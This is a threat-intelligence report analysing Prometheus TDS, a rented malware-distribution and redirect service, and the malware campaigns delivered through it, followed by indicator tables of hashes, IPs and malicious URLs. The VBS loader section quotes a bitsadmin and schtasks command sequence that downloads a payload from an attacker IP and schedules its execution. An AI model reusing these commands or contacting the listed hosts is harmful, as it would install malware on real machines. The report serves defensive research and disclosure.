Introduction

In the spring of 2021, Group-IB’s Threat Intelligence analysts discovered traces of a malware campaign distributing Hancitor. The researchers took an interest in an untypical pattern of the downloader’s distribution, which was subsequently described by Unit 42 and McAfee researchers as a new technique designed to hide documents containing malicious links from web scanners’ radars. However, the data extracted by Group-IB’s analysts indicates that a similar pattern is also used to distribute malware such as Campo Loader, IcedID, QBot, SocGholish, and Buer Loader.

Group-IB discovered at least 3,000 targets of separate malware campaigns that make use of the same scheme. By analyzing the list of targets, the experts were able to establish the two most active campaigns. The first targeted individuals in Belgium, and the second targeted companies, corporations, universities, and government organizations in the United States.

By analyzing the malware distribution campaigns, Group-IB’s experts were able to conclude that it was possible for them to be carried out using the same MaaS solution. This assumption was later confirmed by Group-IB’s analysts after they found a sale notice for a service designed to distribute malicious files and redirect users to phishing and malicious sites — Prometheus TDS (Traffic Direction System) — on one of the underground platforms.

Description

Prometheus TDS is an underground service that distributes malicious files and redirects visitors to phishing and malicious sites. This service is made up of the Prometheus TDS administrative panel, in which an attacker configures the necessary parameters for a malicious campaign: downloading malicious files, and configuring restrictions on users’ geolocation, browser version, and operating system.

To prevent victims of malicious campaigns from interacting with the administrative panel directly, which may result in the attacker’s server being disclosed and blocked, Prometheus TDS uses third-party infected websites that act as a middleman between the attacker’s administrative panel and the user. It should also be mentioned that the list of compromised websites is manually added by the malware campaign’s operators. The list is uploaded through importing links to web shells. A special PHP file named Prometheus.Backdoor is uploaded to the compromised websites to collect and send back data about the user interacting with the administrative panel. After analyzing the data collected, the administrative panel decides whether to send the payload to the user and/or to redirect them to the specified URL.

More than three thousand email addresses targeted in the first phase of malicious campaigns in which Prometheus TDS was used to send malicious emails were extracted by Group-IB Threat Intelligence analysts. The extracted data analysis helped identify the most active campaigns, one targeting individuals in Belgium (more than 2,000 emails) and the other targeting US government agencies, companies, and corporations in various sectors (banking and finance, retail, energy and mining, cybersecurity, healthcare, IT, and insurance), (more than 260 emails). The data about identified targets of attacks with the use of Prometheus TDS and companies affected as their result has been handed over to the US, German and Belgian CERTs.

Targets of malicious campaigns with the use of Prometheus TDS

Targets of malicious campaigns with the use of Prometheus TDS

Attack scheme using Prometheus TDS

The distribution of malware using Prometheus TDS is carried out in several stages.

Stage 1

The user receives an email containing one of the following elements:

  • An HTML file that redirects the user to a compromised site on which Prometheus.Backdoor is installed;
  • A link to a web shell that redirects users to a specified URL, in this case to one of the addresses used by Prometheus TDS;
  • A link to a Google Doc containing the URL redirecting users to a malicious link.
The implementation of malicious campaigns with the use of Prometheus TDS

The implementation of malicious campaigns with the use of Prometheus TDS

Google Docs files used by Prometheus TDS

Google Docs files used by Prometheus TDS

Stage 2

The user opens the attachment or follows the link and is redirected to the Prometheus.Backdoor URL. Prometheus.Backdoor collects the available data on the user.

Stage 3

The data collected is sent to the Prometheus TDS admin panel. This admin panel then decides whether to instruct the backdoor to send a malicious file to the users and/or to redirect them to the specified URL.

Analysis of Prometheus.Backdoor

Malicious campaigns using Prometheus TDS are carried out via hacked sites with Prometheus.Backdoor installed on them. The backdoor is controlled through the admin panel.

Prometheus TDS admin panel

Prometheus TDS admin panel

The data exchange between the administrative panel and the backdoor is encrypted with an XOR cipher. The key for this cipher is explicitly hardcoded in the Prometheus.Backdoor settings, along with the address of the administrative panel used by the attackers to manage backdoors on infected sites.

A fragment of the Prometheus.Backdoor code

A fragment of the Prometheus.Backdoor code containing the address of the administrative panel, a key for encrypting transmitted data, and functions for encrypting and decrypting data

After the user visits the infected site, Prometheus.Backdoor collects basic information about them: IP address, User-Agent, Referrer header, time zone, and language data, and then forwards this information to the Prometheus admin panel.

Part of the Prometheus.Backdoor code used to collect information about the user

Part of the Prometheus.Backdoor code used to collect information about the user’s time zone

Part of the Prometheus.Backdoor code showing the algorithm used to generate a request

Part of the Prometheus.Backdoor code showing the algorithm used to generate a request to the administrative panel for the transfer of visitor data

If the user is not recognized as a bot, then, depending on the configuration, the administrative panel can send a command to redirect the user to the specified URL, or to send a malicious file. The payload file is sent using a special JavaScript code. Most often, the malicious software can be found in weaponized Microsoft Word or Excel documents, however, the attackers also use ZIP and RAR files. In some cases, the user will be redirected to a legitimate site immediately after downloading the file, so it will appear to them like the file was downloaded from a safe source.

Part of the Prometheus.Backdoor code showing a method for serving malicious files

Part of the Prometheus.Backdoor code showing a method for serving malicious files

Malware campaigns analysis

Campo Loader

Analyzing the extracted files, Group-IB Threat Intelligence analysts found 18 unique malicious documents relating to the Campo Loader, aka the BazaLoader malware. After downloading the malware, the user is redirected to the DocuSign or USPS sites as a distraction from the malware’s activity.

A screenshot of a decoy document from the "Campo Loader"

A screenshot of a decoy document from the “Campo Loader” distribution campaign

Campo Loader spreads through malicious macros in Microsoft Office documents. After the victim activates the macros, the loader saves and then decodes the .dll file, which is executed through certutil. After the dumped .dll file is executed, it sends an HTTP request to its C&C server:

Content of the malicious macros

Content of the malicious macros

The server processes the incoming request and, depending on the victim’s geolocation (based on their IP address) decides whether to send the payload or redirect them to Yahoo!, GNU, or other resources. The downloader takes its name from the path of the same name in HTTP requests used to download malicious files during the second stage.

Redirection to gnu.org

Redirection to gnu.org

If the administrative panel gives the command to send the payload, then the user is redirected to the resource where it is stored or receives it directly from the C&C server.

Results of the request satisfying the server's requirements

Results of the request satisfying the server’s requirements to upload a second stage file

Analysis revealed that Campo Loader was used at various times to distribute TrickBot and Ursnif/Gozi bankers, etc.

Campo Loader administrative panel

Campo Loader administrative panel

Hancitor

Monitoring of Prometheus TDS revealed 34 malicious documents relating to the Hancitor malware, which is a downloader trojan.

A screenshot of a decoy document from the Hancitor

A screenshot of a decoy document from the Hancitor distribution campaign

After downloading the malicious document, the victim is either redirected to the DocuSign website, or to phishing sites using IDN domains that imitate the sites of two US banks.

A phishing page to which a user was redirected after downloading a malicious Hancitor load

A phishing page to which a user was redirected after downloading a malicious Hancitor load located on an IDN domain xn--keynvigatorkey-yp8g[.]com (https://urlscan.io/result/108463b8-7c0d-4644-9d2b-52cbca3426f8/)

One of the files identified (SHA1: 41138f0331c3edb731c9871709cffd01e4ba2d88) was sent in a phishing email containing a link to a Google Doc. The document stored in Google Docs contained the link hXXps://webworks.nepila[.]com/readies.php. When the victim clicks on the link, a request is sent to Prometheus.Backdoor. The server then processes the data collected about the user’s system and decides whether to send the payload or not.

An example of requests to a site containing Prometheus.Backdoor

An example of requests to a site containing Prometheus.Backdoor, with successful delivery of a malicious document and subsequent redirection to DocuSign

The screenshot above shows that the response to the first request for the file “readies.php” is 937 bits, while the second one is 424,594 bits. This means that the server approved the victim’s device settings and the second request resulted in the download of the Base64 file “0301_343810790.doc“. After downloading the file, the victim is redirected to Docusign.com.

Part of the Prometheus.Backdoor code

Part of the Prometheus.Backdoor code showing a malicious file distribution pattern

The saved file “0301_343810790.doc” is a .doc file containing malicious macros. After activating the macros in the document, the DLL file is dropped and executed by path c:\users\%username%\appdata\local\temp\Static.dll, using rundll32.exe. After the file has been executed, the following HTTP requests are sent:

  • hxxp://api.ipify[.]org/
  • hxxp://ementincied[.]com/8/forum.php
  • hxxp://mymooney[.]ru/6fwedzs3w3fg.exe
The downloaded file "6fwedzs3w3fg.exe"

The downloaded file “6fwedzs3w3fg.exe” (SHA1: 7394632d8cfc00c35570d219e49de63076294b6b ) is a sample of Ficker Stealer

In April 2021, Unit 42 researchers partially analyzed this campaign. The experts also mention the Ficker Stealer, Cobalt Strike, and Send-Safe spambots in their research.

QBot

The following documents were found among the files used to distribute the banking trojan QBot.

Filename SHA1
document-12603942.xls 2d74e52ac0e3ebbf2bb4aabb6469cba9badd70eb
document-348056604.xls db23b35b2c2b8bf413fb57ee9017127f651e0304

These documents are lure files that require macro activation when launched. As soon as the macros are activated, an HTTP request is sent to download the DLL file with the payload.

Decoy document from the QBot distribution campaign

Decoy document from the QBot distribution campaign

The malicious document discovered was sending requests to the following URL addresses:

  • https://inpulsion[.]net/ds/0702.gif
  • https://aramiglobal[.]com/ds/0502.gif

Unfortunately, at the time of analysis, these files were no longer available. However, our data suggests that QBot is loaded via these paths.

IcedID

One of the malicious documents sent using Prometheus TDS distributed the banking Trojan IcedID, aka Bokbot.

A screenshot of a decoy document from the IcedID malware

A screenshot of a decoy document from the IcedID malware distribution campaign

After opening the document and running the macros, the office file attempted to download and run the DLL file at hXXp://denazao[.]info/images/1j.djvu. The file was not available at the time of analysis. A similar office document was found on VirusTotal; it also downloaded the payload from hXXp://denazao[.]info/images/1j.djvu. After launching the payload, the request was sent to the IcedID C&C server located at hXXp://twotimercvac[.]uno/.

Graph representing the IcedID C2 environment

Graph representing the IcedID C2 environment

VBS Loader

During the analysis, the specialists found three samples of an unidentified VBS loader. After downloading these files, the user is redirected to the USPS website. When the user clicks on a malicious link, Prometheus TDS asks the user to download a ZIP archive containing a VBS script. After the script is launched, the payload is downloaded in the form of another VBS script using bitsadmin. The downloaded file is launched using the Windows Task Scheduler by creating a command that runs the VBS script every 30 minutes starting at 00:00.

Part of the obfuscated VBS loader

Part of the obfuscated VBS loader containing the URL for the payload download

To download and run the payload, the VBS script executes a set of special commands using bitsadmin and schtasks:

  • cmd /k exit | exit & bitsadmin /create EncodingFirm & exit
  • cmd /k exit | exit & bitsadmin /addfile EncodingFirm hXXp://155[.]94[.]193[.]10/user/get/ButPrinciple1619186669 C:\Users\<User>\AppData\Local\Temp\DefineKeeps.tmp & exit
  • cmd /k exit | exit & bitsadmin /resume EncodingFirm & exit
  • cmd /k exit | exit & schtasks /create /sc minute /mo 30 /tn “Task Update ButPrinciple” /f /st 00:00 /tr C:\Users\<User>\AppData\Local\ButPrinciple\ButPrinciple.vbs & exit
  • cmd /k exit | exit & bitsadmin /complete EncodingFirm & exit
  • cmd /k exit | exit & bitsadmin /reset & exit

At the time of analysis, there was only one similar VBS loader sample on VirusTotal, which was detectable by only one antivirus solution.

Antivirus detection for file

Antivirus detection for file fcd8674f8df4390d90dad6c31a3dd6f33d6a74de

Buer Loader

Within the campaign, the file “document010498(1).zip” was also distributed. It contained the file “document010498.jnlp“, which downloads the payload from the domain “secure-doc-viewer[.]com“.

Unfortunately, at the time of analysis, the domain was not active. Based on the contents of the file, it seems reasonable to assume that it is a decoy document used to download files relating to the second stage.

Contents of the file document010498.jnlp

Contents of the file document010498.jnlp

An analysis of the domain “secure-doc-viewer[.]com” by the experts using Group-IB’s graph revealed that the owner’s name, as indicated in the WHOIS records of the domain, is “artem v gushin.” The analysis also showed that this name is connected to more than 50 domains.

Part of the connections of the domain secure-doc-viewer[.]com

Part of the connections of the domain secure-doc-viewer[.]com according to WHOIS records

Among the related domains, researchers identified several of them using the same keywords:

  • pdfsecure[.]net
  • securepdfviewer[.]com
  • invoicesecure[.]net

The domains are also related to .jnlp files, for example, “invoice.jnlp” (SHA1: e3249b46e76b3d94b46d45a38e175ef80b7d0526).

Content of the invoice.jnlp

Content of the invoice.jnlp

Several studies indicate that the above domains are part of the Buer Loader distribution campaign.

SocGholish

The analysis of the URLs of the compromised sites used in the Prometheus TDS infrastructure revealed that some of them redirect the user to the home page of the compromised website.

Prometheus.Backdoor URL

Prometheus.Backdoor URL that redirects the visitor to the home page of the compromised site

Through research, it was discovered that these sites are used to distribute the SocGholish malware under the guise of Google Chrome browser updates.

Loading a landing page with fake Google Chrome browser updates

Loading a landing page with fake Google Chrome browser updates

At the same time, SocGholish uses a malicious file distribution pattern very similar to the script used by Prometheus TDS. When the user visits an infected site, they see a page with JavaScript code that contains a Base64 encoded ZIP archive with a malicious file that will be downloaded if the user clicks on the “Update browser” button.

Part of the SocGholish landing page

Part of the SocGholish landing page

To the user, this page appears to be offering browser updates.

Screenshot of the fake page offering a Chrome browser update

Screenshot of the fake page offering a Chrome browser update

Fake VPN

In addition to distributing malicious files, Prometheus TDS is also used as a classic TDS to redirect users to specific sites. One of these sites is the fake site of a well-known VPN provider located at hXXps://huvpn[.]com/free-vpn/. Clicking the download button initiates the download of a malicious EXE file from hXXps://windscribe.s3.us-east-2.amazonaws[.]com/Windscribe.exe (SHA1: f729b75d68824f200bebe3c3613c478f9d276501).

A screenshot of a fake Windscribe download page

A screenshot of a fake Windscribe download page

Viagra SPAM

Prometheus TDS also redirected users to sites selling pharmaceutical products. Operators of such sites often have affiliate and partnership programs. Partners, in turn, often resort to aggressive SPAM campaigns in order to increase the earnings within the affiliate program. Analysis of the Prometheus infrastructure by Group-IB specialists revealed links that redirect users to sites relating to a Canadian pharmacy.

The use of Prometheus TDS for spam emails

The use of Prometheus TDS for spam emails to redirect users to particular websites

Banking phishing

Prometheus TDS was also used to redirect users to banking phishing sites. For example, during a campaign active from March to May 2021, users who followed the link to Prometheus.Backdoor were redirected to fake sites that mimicked the site of a German bank.

Example of a phishing page

Example of a phishing page used in the campaign involving Prometheus TDS https://urlscan.io/result/69c84104-f272-4c88-970f-a3131c0580ad/

Offers to buy Prometheus TDS on underground forums

The analysis presented above describes several unrelated campaigns carried out by different hacker groups using Prometheus TDS. Working based on the assumption that Prometheus TDS is a MaaS solution, Group-IB researchers analyzed various underground forums in search of relevant offers and found a topic started by a user with the username Main.

Prometheus TDS

Group-IB Threat Intelligence system discovered that the post offering Prometheus for sale was created in August 2020. The owner of the service claimed that Prometheus TDS is an ANTIBOT redirect system designed to send out emails, work with traffic, and for social engineering. In addition, Prometheus TDS can validate web shells, create and configure redirects, operate via proxy, and work with Google accounts, etc. Moreover, the system is able to validate users based on a blacklist, which makes it possible for malicious links to avoid being added to antivirus and spam databases.

Prometheus has two standard modes:

  1. Redirecting users to a target page;
  2. Issuing files for download (DOC, PDF, JS, VBS, EXE).

The cost of the system is $250 per month. Screenshots from Prometheus TDS admin level provided by Main can be found below:

BRChecker

When examining and monitoring the infrastructure used to host the Prometheus TDS administrative panels, Group-IB experts discovered that some of the servers on which the Prometheus TDS admin panel was previously located now host another unknown panel.

The following is a list of addresses at which different panels were located at different times:

  • 188.130.138[.]63;
  • 188.130.138[.]22;
  • 188.130.138[.]236;
  • 188.130.138[.]61;
  • 185.186.142[.]32.

Based on the contents of this admin panel’s JS scripts, Group-IB experts assumed that it is a panel from another solution called BRChecker.

Listing of scripts from BRCheker admin panel

Listing of scripts from BRCheker admin panel

An offer to sell the BRChecker system presented as an email address bruter\checker was for the first time posted by the user with the username Mainin mid-June 2018. According to the developer’s description, the system works via modules (workers), installed on rented VPS servers, and controlled through a single admin panel for subsequent brute-forcing or verification of login/password bindings.

Screenshot of a sale announcement for BRCheker

Screenshot of a sale announcement for BRCheker

As of May 2021, the cost of the system was $490. Screenshots of BRChecker admin panel provided by Main can be found below:

Screenshot of the BRChecker admin panel

Screenshot of the BRChecker admin panel

The contents of the screenshots in the for-sale notice made it possible to verify that the unknown panel detected before is indeed related to BRChecker.

Indicators

Prometheus.Backdoor JavaScript

MD5 SHA1 SHA256
2e515f89c1e57a82f439f160bdc91045 87b16517171f 993b8e0932cf9c27ae8afec169d6 2777c710350668010542846968025d642d40984fa87ad21b3b175c0d2f7e0b31
c5bc239bb990ca808b5645078c6710d1 a9964c999a28c850ef3fbb061d8272025ac38aaf 2f58ac50edbc16d8aa708d2f6b928076c3411a2fdeefa3031013148ec59ad6fe

Prometheus TDS Admin

109.248.11.132
109.248.11.204
109.248.11.67
109.248.203.10
109.248.203.112
109.248.203.168
109.248.203.198
109.248.203.202
109.248.203.207
109.248.203.23
109.248.203.33
185.158.114.121
185.186.142.191
185.186.142.32
185.186.142.59
185.186.142.67
185.186.142.77
188.130.138.130
188.130.138.22
188.130.138.236
188.130.138.57
188.130.138.61
188.130.138.63
188.130.138.70
188.130.139.103
188.130.139.203
188.130.139.228
188.130.139.5
188.130.139.88
46.8.210.13
46.8.210.30
51.15.27.25
62.138.0.68

Campo Loader

Filename MD5 SHA1 SHA256 Malicious URL
order-details-706518.xlsb 0dcd730d8bb4e11b15a18b1dc76fc495 077baa375c2eea771867884cc8eeb632761346c9 a1b1abdf519253a12450708043cfe4fbcc586f288de16f84a64a419521e7f9ba http://85.90.247.25/campo/a/a
user-Payment.xlsb 96e55bf478df6538526fb27d93ae0cff 143034d966a0a8fa125d3cfa2c59f8f6bc077fd1 baa41b445333a1763c335f6cf96f7d7384b419e6b4b3913a903d43267f0e1327 http://195.123.222.26/campo/t/t
user-Payment.xlsb 2c3beba27a366bc0cdca9311b53bbeb9 21f6dc1ce6ae5c47e3fbb3f65fdf43deef90f022 452f2a77f8ebd6aaeb99456dc11ca95b24f6452a0c19c69b409f59949f641369 http://195.123.222.26/campo/t/t
user-Payment.xlsb fd7e9a5318d9a9a64ae6fcda0fecf775 2327e25fd5fda04562b7541d772fb56a4573588e a7bf77112ee1d7c856d90366ea19c436f5723ed67556ef018d3f47cea3711aa8 http://195.123.222.26/campo/t/t
kirill_gelfand-Payment.xlsb 0e813468897ad3c4c13ed181808c07f1 2ae9e9b711cabfa5ed84786a5b40caa458188442 4dd8ba0d5ac44a54b2192267f717057e0db3597b9b0dde873690802cd347e830 http://195.123.222.26/campo/t/t
Information_78333.xlsb 779f1cd885dfc236f72803640408d194 2fbba4ede1959b87c221e48b53566e9861b445b9 e8282f5b348181a9986c759c258cd1fa82f677001c087347e6b12eb2e0350281 http://172.104.151.55/campo/t/t
adir_raz-Payment.xlsb 1cae28a21a78769749abb5f1b861f35f 2fe310539baeba8f254c85bc36ec21a66d73d7d8 1d5d97a5cb51c4d83dfdd662b2171b832ac8093fa9338790d42dd1bc0adfa48c http://195.123.222.26/campo/t/t
Document_898285.xlsb 1bf18263da33a285acc74ff2759ad84e 4306a7fd5c5f91e7508448621e3895a57e38cfce 88ae71852b61934d4d3e27b6acd02c845d11f5596b3b594c60b3b6439e1acf4f http://139.162.190.91/campo/m/m
Attachment_89237.xlsb 46135129250f719456a5053b3eced9a0 43a991b86b533fc1af8d4bb12f41c666f9187764 370ab9a4ac29c2c7a121de17863b40f6c8b69b319f7f06fca61c919c2f0eada3 http://195.123.222.26/campo/t3/t3
user-Payment.xlsb f2927864387a2fe4019ad0aa9113254e 743d4727f828bf2247e5ab2745266194acb44405 97b912e93c00743cced68f7a5ed426f52bd1196c856019af9ad5955426643d47 http://195.123.222.26/campo/t/t
user-Payment.xlsb 2946f055d65da4ec48541d9237d7e157 9b8b5dd6df5b7ea73d2996731abb85178b8f3791 d26a56178fd6d15d1e6a8a15218f1dea8daeb5c2e36e8ecc8b9db3c305b5d16d http://195.123.222.26/campo/t/t
Attachment_64302.xlsb dcf728310285350f57d2b39c036e8b96 9f45863dc4381863a9b9533907b9aaf016211c36 8f329f8fd20acb25617c0d49d002ef7f55a064294483a284cf66466e28e59c6f http://85.90.247.25/campo/o/o
molly.appelfeller-Payment.xlsb cdae61158a97d8bbda68ca756b02aa49 b391fde8dab17a03d9ebddcb628234c1ed203028 d21bb891b88039e9e0d0014499c78457c545dcf71e198ea1a8cba024e411eedd http://195.123.222.26/campo/t/t
damian.piwowar-Payment.xlsb cdae61158a97d8bbda68ca756b02aa49 b391fde8dab17a03d9ebddcb628234c1ed203028 d21bb891b88039e9e0d0014499c78457c545dcf71e198ea1a8cba024e411eedd http://195.123.222.26/campo/t/t
user-Payment.xlsb b8b2409c15aa18979084f4ba779df954 bf7cc9f91cc32937449ddc2f8627b1462099c7ee 9462ed453e355c587086a2005a032c7d05f100963ee781e850da87a53fefc5e0 http://195.123.222.26/campo/t/t
user-Payment.xlsb 77f8fdcca8db0aedd0e02a14a13cad1b c22ab2bc79be021552b7116f7582b6c66a5bee3b 2dc953ad0703d0e921c6e840bb4e136e27c18340cdbecfca93a50f34925c6b6a http://195.123.222.26/campo/t/t
margaret.crain-Payment.xlsb c7d0e439b2020d32bef71af529334fa6 ddf76ac3aee7e090dced9b49857e12efcd140165 452f2a77f8ebd6aaeb99456dc11ca95b24f6452a0c19c69b409f59949f641369 http://139.162.190.64/campo/t3/t3
phillip.taylor-Payment.xlsb c7d0e439b2020d32bef71af529334fa6 ddf76ac3aee7e090dced9b49857e12efcd140165 452f2a77f8ebd6aaeb99456dc11ca95b24f6452a0c19c69b409f59949f641369 http://139.162.190.64/campo/t3/t3
kate.sullivan-Payment.xlsb c7d0e439b2020d32bef71af529334fa6 ddf76ac3aee7e090dced9b49857e12efcd140165 452f2a77f8ebd6aaeb99456dc11ca95b24f6452a0c19c69b409f59949f641369 http://139.162.190.64/campo/t3/t3
tom.powell-Payment.xlsb c7d0e439b2020d32bef71af529334fa6 ddf76ac3aee7e090dced9b49857e12efcd140165 452f2a77f8ebd6aaeb99456dc11ca95b24f6452a0c19c69b409f59949f641369 http://139.162.190.64/campo/t3/t3
molly.appelfeller-Payment.xlsb c7d0e439b2020d32bef71af529334fa6 ddf76ac3aee7e090dced9b49857e12efcd140165 452f2a77f8ebd6aaeb99456dc11ca95b24f6452a0c19c69b409f59949f641369 http://139.162.190.64/campo/t3/t3
tonya.cronce-Payment.xlsb c7d0e439b2020d32bef71af529334fa6 ddf76ac3aee7e090dced9b49857e12efcd140165 452f2a77f8ebd6aaeb99456dc11ca95b24f6452a0c19c69b409f59949f641369 http://139.162.190.64/campo/t3/t3
zmaslen-Payment.xlsb c7d0e439b2020d32bef71af529334fa6 ddf76ac3aee7e090dced9b49857e12efcd140165 452f2a77f8ebd6aaeb99456dc11ca95b24f6452a0c19c69b409f59949f641369 http://139.162.190.64/campo/t3/t3
user-Payment.xlsb c7d0e439b2020d32bef71af529334fa6 ddf76ac3aee7e090dced9b49857e12efcd140165 452f2a77f8ebd6aaeb99456dc11ca95b24f6452a0c19c69b409f59949f641369 http://139.162.190.64/campo/t3/t3
zach.arko-Payment.xlsb c7d0e439b2020d32bef71af529334fa6 ddf76ac3aee7e090dced9b49857e12efcd140165 452f2a77f8ebd6aaeb99456dc11ca95b24f6452a0c19c69b409f59949f641369 http://139.162.190.64/campo/t3/t3
sjenner-Payment.xlsb 10360f4838885037c303c5d1e54a40c1 e22bc05b3ff0891e18f414f0dc468078bf24720d ab1d6eacd13c7ce70852c85f8da60605b30722d728928ee6d65647750061c6f2 http://195.123.220.220/campo/t2/t2
kate.sullivan-Payment.xlsb 10360f4838885037c303c5d1e54a40c1 e22bc05b3ff0891e18f414f0dc468078bf24720d ab1d6eacd13c7ce70852c85f8da60605b30722d728928ee6d65647750061c6f2 http://195.123.220.220/campo/t2/t2
user-Payment.xlsb 10360f4838885037c303c5d1e54a40c1 e22bc05b3ff0891e18f414f0dc468078bf24720d ab1d6eacd13c7ce70852c85f8da60605b30722d728928ee6d65647750061c6f2 http://195.123.220.220/campo/t2/t2
darshana.govindan-Payment.xlsb 10360f4838885037c303c5d1e54a40c1 e22bc05b3ff0891e18f414f0dc468078bf24720d ab1d6eacd13c7ce70852c85f8da60605b30722d728928ee6d65647750061c6f2 http://195.123.220.220/campo/t2/t2
matt.harp-Payment.xlsb 10360f4838885037c303c5d1e54a40c1 e22bc05b3ff0891e18f414f0dc468078bf24720d ab1d6eacd13c7ce70852c85f8da60605b30722d728928ee6d65647750061c6f2 http://195.123.220.220/campo/t2/t2
pbamola-Payment.xlsb 1598cbcca37f6d92037ad5569b152ffa efa8af362029314cafdb5cd3b21acba0c3398b37 b629d7b71d99c562955ed11438f790f240704ad7cf06e848418b5476478a60e8 http://195.123.222.26/campo/t/t

Hancitor

Filename MD5 SHA1 SHA256 Malicious URL
0208_5712084086062.doc 5797d7959a374447e004251696460f83 050990c1fd000aaf8e97eb4d08f349b5b9ccbb32 d600a2c30a57b53a650552ca214453f44c1ddddaea913d2a2c9bd2bbe2b051a0 http://satursed.com/8/forum.php http://sameastar.ru/8/forum.php http://ludiesibut.ru/8/forum.php
0211_18408623163382.doc f919678ac7cc958eea115481a871f781 1f166d3b7dd1d5b20fd86071755bcb294724ba92 8d29410ee9bd9f4004e5d7e397f44280739e3250dddccf134c2c72453802cb3b http://nuencres.com/8/forum.php http://matuattheires.ru/8/forum.php http://desuctoette.ru/8/forum.php
0301_203089882.doc dd655abe26d4749ee69cd8ddff49298f 1ff915cb2697fea83433bcf920a6ae45ba3c9b4e 5f0f68a7db1d84e3ab937cfe8ccb0cfe60ee44feae7c0e430c4a8357992e1ca4 http://ementincied.com/8/forum.php http://watoredprocaus.ru/8/forum.php http://noriblerughly.ru/8/forum.php
0318_41975026189871.doc c5792ce2154c652d9102fa4982dcfce3 32b5eaa378aa90610b40c88b3fbdace3f21b7021 121e2902c085cf41c9b9cddab5bf499da02b01f36ef999aa9aa8f7d818a884ac http://froursmonesed.com/8/forum.php http://abouniteta.ru/8/forum.php http://diverbsez.ru/8/forum.php
0301_343810790.doc 4fa931626b5cfaa706213db17d0c61dc 41138f0331c3edb731c9871709cffd01e4ba2d88 b7efa1277c0c0fba754994adf9792fbb3feac9ec3e589b3da4d0125957cc95a4 http://ementincied.com/8/forum.php http://watoredprocaus.ru/8/forum.php http://noriblerughly.ru/8/forum.php
0406_19770546653272.doc e888673d08cbd88933e71d86d9906962 4701ebac8766510ef789c1a47d144779f0b899c0 1477b09d53363d8f4c717dfb9c8636f1aa8d81786fa2def6c347535863374355 http://cametateleb.ru/8/forum.php http://polionallas.ru/8/forum.php http://divelerevol.com/8/forum.php
0211_41566363811571.doc 502041f49fa41b8548dd4ab95557448e 4f66ac0d73b73f5fed2159dccc7c64761d70088a 9b8cfb1a250908b51fcc50058430514ead1207b8ff1a09aff7b96c16d1c69e6b http://nuencres.com/8/forum.php http://matuattheires.ru/8/forum.php http://desuctoette.ru/8/forum.php
0318_98323640085061.doc ed8d3539a3e027ec713cb7eddbb0dcf6 5253b7e09168b17bc8bfd7938e6ee054f5b5bb59 1d11fee370ab3997737f58df6f80162981c24b61266d0818036d257e7217bbb9 http://froursmonesed.com/8/forum.php http://abouniteta.ru/8/forum.php http://diverbsez.ru/8/forum.php
0318_98323640085061.doc ed8d3539a3e027ec713cb7eddbb0dcf6 5253b7e09168b17bc8bfd7938e6ee054f5b5bb59 1d11fee370ab3997737f58df6f80162981c24b61266d0818036d257e7217bbb9 http://froursmonesed.com/8/forum.php http://abouniteta.ru/8/forum.php http://diverbsez.ru/8/forum.php
0211_2442680243981.doc 63937ba70f16090c167212a5d8c0b2a1 55606e6d1d2806a6b13b88b1fed1e3f9dea6a035 eb8b21c4d9e48ec3d6d4a3864044545c0c100e830a486146baa1b3f4a79f55a4 http://nuencres.com/8/forum.php http://matuattheires.ru/8/forum.php http://desuctoette.ru/8/forum.php
0406_85921776082182.doc fc7fac4b8e77b228f967cd25c39476fa 5b22b18112adbc9cc6db64728f6320b42ef9a66f 715aa88e5563d87cfec57c5d6ef64024afd4ddfd970d8a8b2d424a4fb73ce4f8 http://cametateleb.ru/8/forum.php http://polionallas.ru/8/forum.php http://divelerevol.com/8/forum.php
0324_2126179849261.doc 53b94d001b82e06e57eca67254be3b19 5bd4058c15a3622e70e07a20e1d3ea52dd7a5c60 97dc8e1752f48c022db8ac778822b95658989cf56f82d85c6d6a9ec9c0e6bebb http://tricilidiany.com/8/forum.php http://intaticducalso.ru/8/forum.php http://gloporiente.ru/8/forum.php
0216_2334240256090.doc 8333b8ae870a2cef892130cf985b3d08 632918f8023469a096ef664384446c75e0cd4f2c f3bd817ae5e3e96728add1208b033a94d88518b5b05fca6611c668c51c1d3f25 http://eviddinlahal.com/8/forum.php http://saisepsdrablis.ru/8/forum.php http://obvionsweyband.ru/8/forum.php
0208_34749245710860.doc be5c90e2315d4db22d323adfdc3057f6 6d99dec7ab17caa1da6f12483f39151f6e70ea91 cee3c07353da4b23dc07552631685297cd8299387d68ea6354f5ede40eec7499 http://satursed.com/8/forum.php http://sameastar.ru/8/forum.php http://ludiesibut.ru/8/forum.php
0208_51143810436132.doc 5b991aedb6e96930489fa43aa34afb2c 706a91588eab2b1ded0c93c30d6613b456b2cd8b daa52d10cb1b1df7c372ea823be3047d912f5b69ed3e761b7312df168f6bfb22 http://satursed.com/8/forum.php http://sameastar.ru/8/forum.php http://ludiesibut.ru/8/forum.php
0208_51143810436132.doc 5b991aedb6e96930489fa43aa34afb2c 706a91588eab2b1ded0c93c30d6613b456b2cd8b daa52d10cb1b1df7c372ea823be3047d912f5b69ed3e761b7312df168f6bfb22 http://satursed.com/8/forum.php http://sameastar.ru/8/forum.php http://ludiesibut.ru/8/forum.php
0301_528419802.doc 76fc62eb1167875ec254929fed4cea3e 75777ad54707175412659a502ed54bf55bfaf89a 0a9ca5d5106405262d74dbd8006f982687c58eda0362cf5542cf7068a4ad3db5 http://ementincied.com/8/forum.php http://watoredprocaus.ru/8/forum.php http://noriblerughly.ru/8/forum.php
0210_17982190848201.doc 15e650768be63e70f336744d339bda02 76867406d36aebd8b2975aa305d8f0f2403a0620 1a5d1cd7ed7e2cd7d5cb4f62ed8a0e8ed819dc539cca7fa62b368c00d9806453 http://shifiticans.com/8/forum.php http://anumessensan.ru/8/forum.php http://grectedparices.ru/8/forum.php
0311_77617920093261.doc 112295f0a9ef69518efc4534bebb6865 7fd36afe062136f082c2d3475f7aff24b6b3b847 bc81a5dc9ba20605bb9720190959f61550098281519db9211ae3a0cfe5ba055c http://lationvold.com/8/forum.php http://popubjettor.ru/8/forum.php http://thabilemithe.ru/8/forum.php
0208_14538810068331.doc 7d50dc239691bfc27a648026cebab145 828f3c89af3869533f5d789e6d631c19e7736def 6d0cbeb8f4514d90053db6af6dc06b6ed6e9ac851ea03494405f6b774e39a2e7 http://satursed.com/8/forum.php http://sameastar.ru/8/forum.php http://ludiesibut.ru/8/forum.php
0301_37832604.doc 716488121955bb115302037ed31e6ddb 8b696554838effc3793bfb7d680f8e496c896bb2 df078999b09c399a0e74aad75582a781264deddb8392385c4d80df336b1260d5 http://ementincied.com/8/forum.php http://watoredprocaus.ru/8/forum.php http://noriblerughly.ru/8/forum.php
